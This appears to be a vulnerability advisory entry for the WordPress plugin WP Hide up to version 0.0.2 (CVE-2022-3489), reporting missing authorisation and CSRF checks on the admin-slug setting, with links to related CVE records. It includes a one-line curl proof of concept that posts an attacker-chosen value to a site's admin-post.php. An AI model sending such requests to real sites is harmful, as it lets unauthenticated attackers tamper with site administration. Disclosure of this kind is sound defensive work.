Lucene search
Daniel RufWPVDB-ID:36D78B6C-0DA5-44F8-B7B3-EAE78EDAC505HistoryOct 17, 2022 - 12:00 a.m.
WP Hide <= 0.0.2 - Unauthenticated Settings Update
2022-10-1700:00:00
Daniel Ruf
wpscan.com
1
wordpress
unauthenticated
csrf
0.001 Low
EPSS
Percentile
39.6%
The plugin does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug settings, allowing unauthenticated attackers to update it with a crafted request
PoC
curl -X POST --data “custom_wpadmin_slug=attacker-value” https://example.com/wp-admin/admin-post.php Settings is displayed in Settings > Permalinks
Related
cve
cve
CVE-2022-3489
2022-11-07 10:15:11
wpexploit
wpexploit
WP Hide <= 0.0.2 - Unauthenticated Settings Update
2022-10-17 00:00:00
cvelist
cvelist
CVE-2022-3489 WP Hide <= 0.0.2 - Unauthenticated Settings Update
2022-11-07 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-11-07 10:15:00
nvd
nvd
CVE-2022-3489
2022-11-07 10:15:11